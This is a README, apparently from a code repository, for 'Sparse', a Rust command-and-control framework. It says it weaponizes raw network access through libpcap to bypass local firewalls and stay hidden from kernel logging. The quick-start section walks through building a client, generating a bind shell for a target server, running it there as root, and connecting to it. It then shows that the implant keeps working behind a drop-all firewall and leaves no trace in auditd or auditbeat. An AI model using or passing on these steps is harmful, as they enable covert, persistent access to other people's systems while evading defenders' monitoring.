29 lines
1.7 KiB
Markdown
29 lines
1.7 KiB
Markdown
# Sparse: A Rust C2 framework
|
|
|
|
Developed using libpcap to enable evading local firewalls and with an eye towards hiding itself from inspection. Deprecated in favor of sparse-v2 before being completely developed; the most significant tool this repository contributes is `sparse-05`.
|
|
|
|
This repository weaponizes some of the concepts highlighted in [this blog post](https://andrew.riouxs.co/articles/20251017-direct-network-access.html)
|
|
|
|
## Significant Packages
|
|
- [pcap-sys](./pcap-sys): A Rust wrapper around the libpcap library for Linux
|
|
- [nl-sys](./nl-sys): A Rust wrapper around the netlink (nl) library on Linux
|
|
- [sparse-05](./sparse-05/README.md): A bind shell utility to create bind shells on target servers and connect to them
|
|
|
|
## Development
|
|
|
|
This environment is designed to be developed in with a Nix developer shell, obtained with `nix develop`
|
|
|
|
## Bind shell
|
|
|
|
The most mature implementation of Sparse would be the Sparse version 0.5 bind shell, which has documentation in [its appropriate folder](./sparse-05/README.md).
|
|
|
|
### Quick start:
|
|
|
|
- Install the Nix package manager on a Linux system: [https://nixos.org/download/]
|
|
- Run `nix --experimental-features 'nix-command flakes' build .#sparse-05-client`
|
|
- Generate a Linux server with `result/bin/sparse-05-client generate -t linux service-name`
|
|
- Copy to and run on a target system as root
|
|
- Connect to it with `result/bin/sparse-05-client connect service-name.scon SERVER_IP:54248`
|
|
- Set up a firewall to block all inbound connections with `iptables -P INPUT DROP`, `iptables -F INPUT`; sparse should still be able to connect and operate
|
|
- Run `iptstate`, `auditbeat`, or `auditd` from another session to see that no IP or UDP traffic is being logged by the kernel
|